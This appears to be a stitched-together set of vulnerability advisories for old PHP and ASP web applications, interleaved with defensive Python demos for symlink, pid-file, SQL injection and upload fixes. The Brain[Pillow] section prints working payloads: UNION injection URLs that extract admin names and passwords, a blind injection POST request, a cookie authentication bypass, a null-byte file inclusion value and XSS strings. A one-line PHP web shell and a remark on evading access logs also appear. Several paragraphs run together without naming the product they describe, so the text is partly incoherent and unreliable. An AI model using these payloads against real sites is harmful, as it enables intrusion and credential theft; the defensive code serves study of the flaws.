An arbitrary file upload vulnerability in SAS Hotel Management System lets a remote attacker place a web shell on the server. The attacker registers an account on the site and uploads the shell in place of a profile picture; the application stores it under the upload_images directory, where it can be requested directly in a browser and executed. Versions prior to 1.0.1 are affected.
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'username' and 'passcode' parameters of the 'login.php' script. A remote attacker can send a specially crafted HTTP request containing SQL syntax in either parameter and execute arbitrary SQL commands in the application's database. This can be exploited to bypass authentication and gain access to the application.
The attacker must be logged in as an ordinary user. The exploit relies on the preg_replace() /e modifier, which makes PHP evaluate the replacement string as code after the backreferences have been substituted, so attacker-controlled matched text becomes executed PHP (the modifier was deprecated in PHP 5.5 and removed in PHP 7.0). The register_globals setting does not matter. Sentinel will not stop this exploit. Because the payload travels in a POST body, it does not appear in a standard web server access log, which records only the request line, so in most real-world cases the exploit leaves clean logs.
A local attacker could perform a symlink attack to overwrite arbitrary files on the system with root privileges, inject arguments into the 'kill' command to terminate or send arbitrary signals to any process as root, or cause a denial of service by preventing the virtual machines from starting.
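The two root-level mistakes the advisory describes, a privileged script following an attacker-planted symlink and a pid read from a file being expanded into the kill command line, shown next to their safe counterparts, as an added example. This is not code from the affected product, which the advisory does not name; the file names and the temporary directory standing in for /var/run are hypothetical, and the "victim" file is created by the demo itself.

```python
import os
import signal
import tempfile

PID_MAX = 4194304     # Linux pid_max ceiling (2**22)


def parse_pid(text):
    """Accept exactly one positive integer; '-9 1', '1 2', '' and '1;rm x' all return None."""
    text = text.strip()
    if not (text.isascii() and text.isdigit()):
        return None
    pid = int(text)
    return pid if 1 < pid <= PID_MAX else None   # 0 = own process group, 1 = init: never signal those


def unsafe_kill_argv(pidfile_contents):
    """What a shell does with `kill $pid` when the pid file is attacker-writable:
    '-9 1' becomes `kill -9 1` (SIGKILL to init).  Returned here, never executed."""
    return ["kill"] + pidfile_contents.split()


def safe_kill(pidfile_contents, sig=signal.SIGTERM, really=False):
    """Signal only a validated integer pid through os.kill(): no shell, nothing to inject."""
    pid = parse_pid(pidfile_contents)
    if pid is None:
        raise ValueError("pid file does not contain a single pid; refusing to signal")
    if really:
        os.kill(pid, sig)
    return pid


def write_private_file(path, data):
    """Create the file only if nothing (file or symlink) already exists at `path`.
    O_EXCL makes open() fail with EEXIST on a pre-planted symlink instead of following it,
    so a local user cannot turn a root write into an overwrite of a file of their choosing."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)


def demo_symlink_attack():
    """Plant a symlink the way a local attacker would, then compare the two writers.
    Returns (safe writer refused, naive open() overwrote the symlink target)."""
    d = tempfile.mkdtemp(prefix="vmrun_")
    target = os.path.join(d, "victim_file")         # stands in for a root-owned file
    link = os.path.join(d, "vm.pid")                 # predictable path the script will write
    with open(target, "wb") as fh:
        fh.write(b"original")
    os.symlink(target, link)
    try:
        write_private_file(link, b"attacker-chosen content")
        refused = False
    except OSError:                                  # EEXIST (or ELOOP with O_NOFOLLOW)
        refused = True
    with open(link, "wb") as fh:                     # the vulnerable pattern: follows the link
        fh.write(b"attacker-chosen content")
    with open(target, "rb") as fh:
        overwritten = fh.read() == b"attacker-chosen content"
    return refused, overwritten


if __name__ == "__main__":
    print("kill argv from hostile pid file:", unsafe_kill_argv("-9 1"))
    print("validated pid:", safe_kill("4321"))
    print("symlink defence (safe refused, naive overwrote):", demo_symlink_attack())
```

The same O_CREAT|O_EXCL rule applies to any file a privileged service creates at a predictable path; when the path must be reused, create it once in a directory only root can write to rather than in /tmp.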
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'myhotel_info.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database. This can be exploited to bypass authentication, read sensitive information, modify data and so on.
MemHT Portal is vulnerable to SQL injection in the 'deletenewpm' parameter of the 'pages/pvtmsg/index.php' script. An attacker can send a crafted value in the 'deletenewpm' parameter to delete all private messages from the database. The vulnerability is exploitable regardless of php.ini settings.
Brain[Pillow] is vulnerable to blind SQL injection, standard SQL injection, SQL injection in the authentication check, local file inclusion and shell upload. The blind and standard SQL injections are exploited by sending a crafted request to the vulnerable application with magic quotes off. The authentication SQL injection is exploited by setting the cookie nova_name to admin'# and nova_password to 1c20a3e48e3b6607fedded430a20f606 with magic quotes off: the single quote closes the string literal and the # comments out the rest of the WHERE clause, so the password comparison is never evaluated. Local file inclusion is exploited by setting the cookie nova_lang to ../index.php%00 with no nova_name cookie present and magic quotes off; the %00 relies on the null byte truncating the path, which PHP allowed before 5.3.4. Shell upload is exploited by sending a crafted request with magic quotes off and uploading a file with a .php extension.
SQL injection #1 requires magic quotes to be off and the attacker to be logged in as a registered user. Example:

  /edituser.php?Active=index&action=details&ID=-850'+union+select+0,name,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15+from+pml_users+limit+1,1/*

SQL injection #2 requires magic quotes to be off and is a blind injection, sent in the body of a POST request:

  POST /activate.php?action=resendsave HTTP/1.1
  Host: localhost
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 65

  ReSendUser=cekac' union select 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6#

SQL injection #3 requires magic quotes to be off and pulls the name, pass, email and icq columns of the admin row out of pml_users in one UNION query (the trailing quote is left open because the application supplies the closing one):

  /list.php?Active=INTERNET_OPASNOSTE'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(char(58),name,pass,email,icq),23,24,25,26,27,28,29,30,31,32,33+from+pml_users+where+name='admin'+and+1='1

Reflected (passive) XSS examples:

  /edituser.php?Active=index&Display=&&action=<h1>onotole power</h1>
  /edituser.php?Active=index&Display=&action=&F=&fltname='><h1>upyachka,upyachka</h1><div style=display:none>
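The cookie-based authentication bypass with nova_name=admin'# described for Brain[Pillow], and the string-built queries behind the other injections on this page, as an added example that is not code from any of the affected applications. It emulates PHP's addslashes() (what magic_quotes_gpc applied to every cookie and request value), re-parses the resulting statement the way MySQL does (backslash escapes inside a quoted literal, # starting a comment) and runs the effective statement in an in-memory SQLite database next to a parameterized version of the same login. The users table, its column names, the stored hash and the attacker's cookie password value are constructed for the demo.

```python
import sqlite3

# Constructed sample data: column names and the stored 32-hex "hash" are hypothetical.
ADMIN_HASH = "0" * 32
USERS = [("admin", ADMIN_HASH), ("guest", "1" * 32)]
ATTACKER_PASS = "f" * 32          # arbitrary cookie value; with the bypass it is never compared


def addslashes(value):
    """Emulates PHP addslashes(): what magic_quotes_gpc did to GET/POST/cookie values."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def build_login_query(name, password, magic_quotes):
    """The vulnerable pattern: cookie values concatenated straight into SQL."""
    if magic_quotes:
        name, password = addslashes(name), addslashes(password)
    return f"SELECT name FROM users WHERE name='{name}' AND pass='{password}'"


def mysql_effective(sql):
    """Re-read a statement as MySQL (default sql_mode) would: a backslash inside a
    single-quoted literal escapes the next character, '' stands for one quote, and a '#'
    outside any literal starts a comment that runs to end of line.  Returns the statement
    with the comment dropped and every literal re-emitted with doubled quotes (the
    dialect-neutral form SQLite accepts too), plus the decoded literal values."""
    out, literals, i, n = [], [], 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch == "'":
            j, buf = i + 1, []
            while j < n:
                c = sql[j]
                if c == "\\" and j + 1 < n:            # \' \\ etc. (simplified: \x -> x)
                    buf.append(sql[j + 1]); j += 2
                elif c == "'" and j + 1 < n and sql[j + 1] == "'":
                    buf.append("'"); j += 2
                elif c == "'":
                    break
                else:
                    buf.append(c); j += 1
            value = "".join(buf)
            literals.append(value)
            out.append("'" + value.replace("'", "''") + "'")
            i = j + 1
        elif ch == "#":                                # comment: the rest of the line is ignored
            break
        else:
            out.append(ch); i += 1
    return "".join(out), literals


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(name, password, magic_quotes=False):
    """Returns the user name the app would consider authenticated, or None."""
    effective, _ = mysql_effective(build_login_query(name, password, magic_quotes))
    row = _connect().execute(effective).fetchone()
    return row[0] if row else None


def login_parameterized(name, password):
    """The fix: placeholders keep admin'# inside the value, whatever php.ini says."""
    row = _connect().execute(
        "SELECT name FROM users WHERE name=? AND pass=?", (name, password)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "admin'#"
    for mq in (False, True):
        sql = build_login_query(payload, ATTACKER_PASS, mq)
        print("magic_quotes=%s: %s" % (mq, sql))
        print("  effective    :", mysql_effective(sql)[0])
        print("  logged in as :", login_vulnerable(payload, ATTACKER_PASS, mq))
    print("parameterized  :", login_parameterized(payload, ATTACKER_PASS))
```

With magic quotes off the effective statement collapses to SELECT name FROM users WHERE name='admin' and the admin row comes back; with magic quotes on the quote is escaped, the # stays inside the literal and no row matches. The parameterized query gives the same "no row" result in both configurations, which is why it, and not a php.ini setting, is the fix for every injection listed above.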
This exploit allows an attacker to execute arbitrary commands on the vulnerable system. It is triggered by sending a malicious HTTP POST request to the vulnerable application. The application also contains multiple local file inclusion (LFI) vulnerabilities, which are exploitable only when register_globals is enabled.
This exploit allows an attacker to upload a malicious file to the vulnerable server. The uploaded file carries a payload that lets the attacker execute arbitrary commands on the server. The vulnerability exists because the application does not adequately validate uploaded files. The exploit was discovered by Sp3shial and published in 2008.
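An upload handler with the validation the three file-upload issues on this page (SAS Hotel Management System's profile picture, Brain[Pillow]'s .php upload and this one) lack, as an added example and not code from any of those applications. It accepts a file only when the extension and the leading magic bytes agree on an allow-listed image type, stores it under a random server-chosen name with mode 0644, and never reuses the client's file name; the sample uploads, the directory and the helper names are constructed for the demo. The content check alone is not sufficient (a valid JPEG with PHP appended still passes it), which is why the stored name can never carry a script extension and why the upload directory must additionally be configured not to execute scripts.

```python
import os
import secrets
import tempfile

# Allow-listed types: extension -> leading magic bytes the content must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Constructed sample uploads (not files from any advisory).
PNG_SAMPLE = ALLOWED["png"] + b"\x00" * 16
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"


class RejectedUpload(ValueError):
    pass


def validate_image(filename, data):
    """Return the canonical extension when name and content agree; raise otherwise."""
    base = os.path.basename(filename.replace("\\", "/"))   # drop any client-supplied path
    if base.count(".") != 1 or base.startswith("."):       # rejects 'shell.php.jpg', '.htaccess', 'shell'
        raise RejectedUpload("file name must have exactly one extension")
    ext = base.rsplit(".", 1)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None:
        raise RejectedUpload(f"extension .{ext} is not an allowed image type")
    if not data.startswith(magic):
        raise RejectedUpload("content does not match the claimed image type")
    return "jpg" if ext == "jpeg" else ext


def is_accepted(filename, data):
    try:
        validate_image(filename, data)
        return True
    except RejectedUpload:
        return False


def save_upload(upload_dir, filename, data):
    """Validate, then write under a random name the client never influences."""
    ext = validate_image(filename, data)
    name = secrets.token_hex(16) + "." + ext
    path = os.path.join(upload_dir, name)
    # O_EXCL: never overwrite (or follow a planted symlink); 0o644: never executable
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return name


def demo_round_trip():
    """Store the constructed PNG in a temp dir; returns (stored name, bytes read back)."""
    upload_dir = tempfile.mkdtemp(prefix="upload_images_")
    name = save_upload(upload_dir, "../../shell.png", PNG_SAMPLE)   # traversal in the name is ignored
    with open(os.path.join(upload_dir, name), "rb") as fh:
        return name, fh.read()


if __name__ == "__main__":
    for fn, data in [("avatar.png", PNG_SAMPLE), ("shell.php", PHP_SHELL),
                     ("shell.php.png", PNG_SAMPLE), ("shell.png", PHP_SHELL)]:
        print(f"{fn:15} -> {'accepted' if is_accepted(fn, data) else 'rejected'}")
    print("stored as", demo_round_trip()[0])
```

On the web server side, pair this with a rule that the upload directory serves files as static content only (no PHP handler for it); then even an image with embedded PHP is delivered as bytes, not executed.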